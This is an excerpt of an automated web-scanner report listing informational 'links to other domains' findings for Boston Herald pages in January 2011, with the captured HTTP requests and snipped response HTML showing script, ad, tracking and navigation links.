http://www.bostonherald.com/news/politics/view.bg?articleid=1312665&srvc=home&position=comment

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128speaker_deleo_shakes_up_house%2Fsrvc%3Dhome%26position%3D1&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/politics/view.bg?articleid=1312665&srvc=home&position=comment HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128speaker_deleo_shakes_up_house%2Fsrvc%3Dhome%26position%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speaker DeLeo shakes up House');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(26) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in..." /></div>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.287. http://www.bostonherald.com/news/regional/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/regional/?srvc=home&position=4

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/ada04c_Collapse_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/416295_FridayThrowdown0610_315x275.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/b53b7b_Bryan_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/regional/?srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Local Coverage - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal."></a>
...[SNIP]...
<a href="/news/regional/view/20110128another_winter_wallop_batters_boston/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=loc&position=">
...[SNIP]...
<a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/ada04c_Collapse_01282011.jpg" alt="FALLING DOWN: Rescue workers are at the scene where two drivers were trapped in a roof collapse in Lynn yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/srvc=loc&position=">
...[SNIP]...
<a href="/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg" alt="TRAPPED: Boston firefighters rescue a stranded crane operator from a stuck elevator at the Conley Terminal in South Boston."></a>
...[SNIP]...
<a href="/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/b53b7b_Bryan_01282011.jpg" alt="COURT DISPATCH: Somerville cab driver Tyler Bryan, 25, waits yesterday in Brighton District Court, where he was arraigned on drunken-driving charges."></a>
...[SNIP]...
<a href="/news/regional/view/20110128cops_arrest_drumgold_on_drug_charges/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" alt="Shawn Drumgold"></a>
...[SNIP]...
<a href="/news/regional/view/20110127how_do_you_see_the_state_of_the_union/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/416295_FridayThrowdown0610_315x275.jpg" alt=""></a>
...[SNIP]...
<a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" alt="STUCK: Terri Farrell tries to navigate in her scooter along L Street in South Boston. She says she’s been forced to stay home because of all the snow."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/srvc=loc&position=">
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Local Politics" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<a href="/news/police_logs/">
<img style="float:left; margin:2px 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" >
<div style="overflow:hidden; height:57px; max-height:57px">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.288. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312541&format=email

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Demail&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg
http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.myspace.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/regional/view.bg?articleid=1312541&format=email HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
